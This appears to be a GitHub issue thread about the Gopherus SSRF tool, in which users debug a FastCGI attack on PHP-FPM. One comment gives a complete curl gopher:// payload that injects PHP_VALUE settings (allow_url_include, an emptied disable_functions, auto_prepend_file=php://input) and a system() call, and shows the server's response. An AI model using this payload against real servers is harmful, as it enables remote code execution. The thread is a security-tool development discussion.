Closed mpchadwick closed 5 years ago
tarunkant
commented
5 years ago Hey, if we wanted to look the file which doesn't have permissions, then why don't we first get the RCE through default file location and then try to read the file you want or find the files you want.
mpchadwick
commented
5 years ago @tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.
I believe doing this would remove the requirement to know the location of a .php file on the system.
I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.
If if helps I mean something like this:
https://github.com/tarunkant/Gopherus/commit/908d138d149a129f04d239e7d638a5d918124208
mpchadwick
commented
5 years ago Hmm I figured out the FCGI_PARAMS format however it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...
curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8
File not found.
no-%Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls and in the place of COMMAND you wrote /etc/passwd.
And are we able to unable security.limit_extensions (I think no)?
tarunkant
commented
5 years ago Btw, you can put the file name /etc/passwd, but it's preferable to put .php extension file(btw, I did put one default file, which will be there always if PHP is installed).
mpchadwick
commented
5 years ago @tarunkant thanks for all the follow up here. Just to note, it's not true that /usr/share/php/PEAR.php will always be present (which is why I was seeing it's it's possible to use a file that isn't .php by modifying the security.limit_extensions directive)
[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/phpUnfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions this way.
mpchadwick
commented
5 years ago Turns out the file is present on my system, just in a slightly different location.
/usr/share/pear/PEAR.phpCool, you can also check with /etc/passwd, it will work.
mpchadwick
commented
5 years ago You're right. It does work for me.
There's a good chance of finding phar files in standard locations according to their installation guides.
E.g.
Currently I get error below when trying to use with
/usr/local/bin/composer